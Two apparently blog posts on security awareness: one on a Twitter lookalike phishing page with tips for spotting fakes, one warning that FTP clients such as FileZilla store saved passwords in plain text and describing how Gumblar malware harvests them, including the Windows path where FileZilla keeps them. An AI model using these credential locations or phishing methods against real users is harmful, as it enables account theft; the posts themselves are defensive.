Phishing page – Twitter’s lookalike!

itwitterl.com - Phishing scam
itwitterl.com - Phishing scam

 Phishing pages? Again? Really?!

And the skiddies have done it again. But now they have evolved! Let me put this blogpost into a bit of context before I proceed.

What the heck is Phishing?

Well phishing is a method that hackers, well let’s use correct terminology, script-kiddies use to hijack accounts. They basically create a landinglogin page very similar to a popular web based service such as (Facebook, Twitter, gmail, hotmail etc…) and then they buy domain names that are also very close to the real service’s name such as (Fac3b00k.com, itwitterl.com, h0tma1l.com…) with small typos as you can see, that you wouldn’t even notice.

You are drive by your predisposed urge to enter your credentials whenever you see a login page, and BOOM! Your account is hijacked almost instantly. The password is changed (If the phishing page is good, automatically) and if the skiddy is not good or knows no programming language, heshe will change it manually at a later stage.

Uhh… What?!

Let’s take an example. Today I got the following direct message from a friend:

Phishing tweet - from a trusted friend
Phishing tweet - from a trusted friend

and almost instantaneously I clicked on the link. It was a shortened URL so I couldn’t see the actual domain I was visiting. I landed on this page:

Phishing twitter lookalike.
Phishing twitter lookalike - This is the Fake one.

Now i’m confused, why is it asking me for credentials?! Since I have a little bit of hackingdeception background and I’ve played these games before, my quick reaction was… hehehe, nice try. I looked at the address bar and it said: http://itwitterl.com/session-timed_out/ 

Wow! Twitter have a new domain name!

I then entered false credentials and here’s where I landed:

itwitter.com Fake service status page
itwitter.com's Fake service status page

Whether you put correct credentials or false ones you will always land on this page. Because this website is not the actual Twitter, and they cannot actually log you into the service!

Ohhhh… how can we tell the difference next time?

You can tell the different easily, as long as you don’t rush to put your credentials quickly whenever asked without checking the legitimacy of a certain website first.

Here’s the actual twitter page:

The real Twitter homepage
The real Twitter homepage - There's a lot of difference.

If you spend a second or two looking at both images you will see there is a lot of difference! The skids are not up-to-date!

Tips for not falling into this trap again, and what to do if you are a victim

Below are 4 tips of making sure the website you are logging into is legit:

1. Check the address bar, make sure the domain name is correct.

2. Check the title, many skids forget to fix the title of the page they created.

3. If you are logged into a service and you haven’t closed your browser it will not make you login again unless you’re changing critical information using their platform. They will notify you.

4. Check the favicon, some skids forget to update theirs as well.

I’m a victim 🙁

If you provided your credentials for this fake service, instantly go and change your password! If you were one of the few unlucky ones who have had their password changed for them. I’m sorry to tell you, your account is lost unless you still have ownership of the email address andor you still remember your secret question or answer. Then you can use the “forget my password” feature available for most if not all popular services.

FTP Saved Passwords threat

filezilla screenshot
FileZilla : http://filezilla-project.org

Introduction

This is a short post to warn about the dangers of saved passwords in popular FTP Clients. Saved passwords, in most open source software, are a threat since any encryption technique will not protect this sensitive type of data since the source is released to the public and reversing the encryption methodologies renders unproblematic.

The Gumblar botnet

What is known as Gumblar or Troj/JSRedir-R is a malicious threat which comes from PDF documents. Gumblar redirects visitors to a variety of websites containing other malware. The process of infection is undetectable, since the infected PDF is opened by the Adobe Acrobat’s plugin in the browser or by Adobe Acrobat itself, which, then, allows Gumblar to look for the saved passwords files, stored by FTP clients such as FileZilla or Dreamweaver, which are in plain text (either in XML format or other files).

It then connects to the FTP servers and modifies every HTML, JavaScript, XML, CSS file online by appending a JavaScript redirection to a malicious website in order to infect further victims.

Gumblar also sniffs network traffic for FTP passwords as well. (Further Gumblar information is not described in this post).

FileZilla case

The location of the password files varies depending on the operating system. However on windows for example it’s stored in the directory:

%APPDATA%/FileZilla

A sample screenshot of one of the files containing unprotected passwords can be found below:

sitemanager-xml FileZilla
sitemanager-xml File

WinSCP is it a good replacement?

When thinking about a solution for this problem, there is no straight forward method. Furthermore using another FTP client is not the answer! WinSCP stores the saved passwords as registry keys, however it’s in plain text as well.

Conclusion

In case you were infected and Gumblar successfully connected to all your FTP servers and modified all your files (check the Gumblar botnet section above), you have to rollback all your HTML, Javascript, XML, CSS files to a previous clean version. In case you don’t have a previous version, well… A search and replace (via Regular Expressions) becomes your only solution (will not go into details of how to do this, maybe in future posts).

There is no fail-safe method of protecting this type of data, however following the steps below can help reduce the severity of this threat:

1.       Never store your FTP information in any FTP client.

2.       An alternative solution for storing FTP passwords can be found here (http://sww.co.nz/an-alternative-to-storing-passwords-in-filezilla-or-other-ftp-clients/). However use this solution at your responsibility. I have not tested this solution.

This post is in no way a recommendation against using FileZilla or any other FTP client, it is written to warn about the dangers of using stored FTP credentials.